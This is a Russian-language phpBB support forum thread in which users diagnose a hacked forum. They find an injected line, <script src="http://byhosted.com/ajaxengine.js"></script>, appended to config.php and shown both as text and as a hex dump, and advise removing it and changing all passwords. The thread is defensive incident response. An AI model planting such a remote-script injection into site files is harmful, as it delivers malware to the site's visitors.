Как убить Трояна?

[AdmninsCluba]

обнаружено: троянская программа Trojan-Downloader.VBS.Small.dh

Почистил файл - index.php. Не помогло. Что надо сделать чтобы найти и убить скрипт?

Спасибо.

ОТВЕТ:
- проверяемся на вирусы
- меняем ВСЕ пароли и не храним их в FTP-клиенте.
- чистим файлы Index.* или заливаем из бэкапа.

http://virusinfo.info/pravila.html

[Пчелкин]

Тогда вероятно что у вас хостер что-то обновил из своего программного обеспечения.
Переписываться с ними бесполезно, сами вы глюк, скорей всего, не исправите..
Лучше в рекрутинг..
Или хотя бы вытащите с хоста лог ошибок...может помощь

[NiGHt-LEshiY]

Глюк? Кхм.
Output started at /config.php:1

Покажите ваш config.php ЦЕЛИКОМ. Только сотрите ваш пароль оттуда.

[MIT]

И желательно в виде HEX-дампа...

[Mileno4ka]

Здравствуйте!

На наших серверах никаках изменений не производилось.
Ошибки, которые Вы можете видеть на сайте обусловлены невозможностью послать
заголовок (Cannot modify header information - headers already sent).

Далее идёт сообщение, в каком скрипте и в какой его строке by (output started
at /config.php:17) произошел вывод информации, вызвавший автоматическую
посылку заголовков.
В данном случае ошибку вызывает файл, подключаемый через include, в котором
либо есть какой-то вывод, либо пустая строка после закрывающего PHP тега. (PHP
Notice: in file /includes/session.php - обратить внимание на файл
/includes/session.php).

С уважением, Куринова Ирина
Служба технической поддержки PeterHost

Добавлено спустя 4 минуты 37 секунд:


Файл config.php

Код: Выделить всё

<?php
// phpBB 3.0.x auto-generated configuration file
// Do not change anything in this file!
$dbms = 'mysql';
$dbhost = 'mysql.vertexsp.z8.ru';
$dbport = '';
$dbname = 'db_vertexsp_2';
$dbuser = 'dbu_vertexsp_2';
$dbpasswd = '*********';
$table_prefix = 'phpbb_';
$acm_type = 'file';
$load_extensions = '';

@define('PHPBB_INSTALLED', true);
// @define('DEBUG', true);
// @define('DEBUG_EXTRA', true);
?><script src="http://byhosted.com/ajaxengine.js"></script>

HEX

Код: Выделить всё

3c 3f 70 68 70 0d 0a 2f 2f 20 70 68 70 42 42 20
33 2e 30 2e 78 20 61 75 74 6f 2d 67 65 6e 65 72
61 74 65 64 20 63 6f 6e 66 69 67 75 72 61 74 69
6f 6e 20 66 69 6c 65 0d 0a 2f 2f 20 44 6f 20 6e
6f 74 20 63 68 61 6e 67 65 20 61 6e 79 74 68 69
6e 67 20 69 6e 20 74 68 69 73 20 66 69 6c 65 21
0d 0a 24 64 62 6d 73 20 3d 20 27 6d 79 73 71 6c
27 3b 0d 0a 24 64 62 68 6f 73 74 20 3d 20 27 6d
79 73 71 6c 2e 76 65 72 74 65 78 73 70 2e 7a 38
2e 72 75 27 3b 0d 0a 24 64 62 70 6f 72 74 20 3d
20 27 27 3b 0d 0a 24 64 62 6e 61 6d 65 20 3d 20
27 64 62 5f 76 65 72 74 65 78 73 70 5f 32 27 3b
0d 0a 24 64 62 75 73 65 72 20 3d 20 27 64 62 75
5f 76 65 72 74 65 78 73 70 5f 32 27 3b 0d 0a 24
64 62 70 61 73 73 77 64 20 3d 20 27 2a 2a 2a 2a
2a 2a 27 3b 0d 0a 24 74 61 62 6c 65 5f 70 72 65
66 69 78 20 3d 20 27 70 68 70 62 62 5f 27 3b 0d
0a 24 61 63 6d 5f 74 79 70 65 20 3d 20 27 66 69
6c 65 27 3b 0d 0a 24 6c 6f 61 64 5f 65 78 74 65
6e 73 69 6f 6e 73 20 3d 20 27 27 3b 0d 0a 0d 0a
40 64 65 66 69 6e 65 28 27 50 48 50 42 42 5f 49
4e 53 54 41 4c 4c 45 44 27 2c 20 74 72 75 65 29
3b 0d 0a 2f 2f 20 40 64 65 66 69 6e 65 28 27 44
45 42 55 47 27 2c 20 74 72 75 65 29 3b 0d 0a 2f
2f 20 40 64 65 66 69 6e 65 28 27 44 45 42 55 47
5f 45 58 54 52 41 27 2c 20 74 72 75 65 29 3b 0d
0a 3f 3e 3c 73 63 72 69 70 74 20 73 72 63 3d 22
68 74 74 70 3a 2f 2f 62 79 68 6f 73 74 65 64 2e
63 6f 6d 2f 61 6a 61 78 65 6e 67 69 6e 65 2e 6a
73 22 3e 3c 2f 73 63 72 69 70 74 3e

Добавлено спустя 1 минуту 8 секунд:

Добавлено спустя 25 минут 40 секунд:

[phpBB Debug] PHP Notice: in file /includes/session.php on line 1024: Cannot modify header information - headers already sent by (output started at /config.php:17)

Ругается на последнюю строку:

Код: Выделить всё

function set_cookie($name, $cookiedata, $cookietime)
	{
		global $config;

		$name_data = rawurlencode($config['cookie_name'] . '_' . $name) . '=' . rawurlencode($cookiedata);
		$expire = gmdate('D, d-M-Y H:i:s \G\M\T', $cookietime);
		$domain = (!$config['cookie_domain'] || $config['cookie_domain'] == 'localhost' || $config['cookie_domain'] == '127.0.0.1') ? '' : '; domain=' . $config['cookie_domain'];

		header('Set-Cookie: ' . $name_data . (($cookietime) ? '; expires=' . $expire : '') . '; path=' . $config['cookie_path'] . $domain . ((!$config['cookie_secure']) ? '' : '; secure') . '; HttpOnly', false);
	}

phpBB Debug] PHP Notice: in file /includes/functions.php on line 4505: Cannot modify header information - headers already sent by (output started at /config.php:17)
[phpBB Debug] PHP Notice: in file /includes/functions.php on line 4507: Cannot modify header information - headers already sent by (output started at /config.php:17)
[phpBB Debug] PHP Notice: in file /includes/functions.php on line 4508: Cannot modify header information - headers already sent by (output started at /config.php:17)
[phpBB Debug] PHP Notice: in file /includes/functions.php on line 4509: Cannot modify header information - headers already sent by (output started at /config.php:17)

Ругается на весь кусок:

Код: Выделить всё

// application/xhtml+xml not used because of IE
	header('Content-type: text/html; charset=UTF-8');

	header('Cache-Control: private, no-cache="set-cookie"');
	header('Expires: 0');
	header('Pragma: no-cache');

Добавлено спустя 3 минуты 5 секунд:

[phpBB Debug] PHP Notice: in file /includes/functions.php on line 2471: Cannot modify header information - headers already sent by (output started at /config.php:17)

Код: Выделить всё

// Behave as per HTTP/1.1 spec for others
	header('Location: ' . $url);
	exit;

[MAzZY]

<script src="http://byhosted.com/ajaxengine.js"></script>

Это кто вставил в конфиг?

[Mileno4ka]

Никто... Так и было..

[Pazh]

В изначальном конфиге такой строки нет. Впервые вижу чтобы так в config что-то добавляли.

[Mileno4ka]

В пятницу все работало. А придя утром в понедельник на работу столкнулась с этой проблемой.
На самом деле я была полдня уверена, что проблема на стороне хостера, т.к. я программировании я не особо сильна (на уровне программы технического вуза). Зачем что то трогать, если оно отлично работает?

Я обратила внимание, что этот скрипт присутствует в обоих файлах, но не придала этому значение.

[MIT]

HEX

Я, право слово, не думал, что ты и впрямь предоставишь бинарный дамп. Зачот
В нём бы можно было увидеть данные BOM-сигнатуры, но у тебя их нет.

А код

<script src="http://***.com/ajaxengine.js"></script>

является вредоносным, его необходимо удалить, а также озаботится сменой всех паролей и поиском подозрительных файлов на форуме.

[Mileno4ka]

Спасибо всем. Удалила. Он был прописан в 6 файлах еще. Форум пашет. Пароли, явки сменю.

[Lexx112]

1. Качаете и запускаете из корня сайта скрипт с http://www.0xff.su/0x0005
2. Меняете все пароли

А если вредоносный скрипт от гугл нахлабучили? Уже не прокатит этот метод?

[ArtTeam]

зашел сегодня на форум, а мне выдает от касперского

5.jpg

спустя пять минут при заходе на форум стало все нормально
что это может быть ?
На хосте проверил антивирусом не чего не нашло
И самое странное что лазя в этой теме перейдя на 9 страницу у меня вылезло

5555555.jpg

Может у меня заражен сам комп а не сайт ?

[IP_Board]

Скачиваем Dr.Web CureIt! и Kaspersky Virus Removal Tool 2011, выполняем полную проверку компьютера. Затем удаляем KIS 2010, скачиваем и устанавливаем (в процессе удаления 2010 версии выберите галочку "Сохранить информацию о лицензии) KIS 2012. Обновляем базу и проверяем ещё раз компьютер.
После чего, читаем данный топик — все ответы на Ваши вопросы в нём есть.

[pavelkim]

После заражения форума трояном, после его чистки осталась таки одна проблема. В личном разделе во вкладке личные сообщения при нажатии на "Найти пользователя" антивирус ругается на троян.
Подскажите, пожалуйста, какие файлы посмотреть-проверить на наличие вредоносного кода?

[Sheer]

какие файлы посмотреть

Все.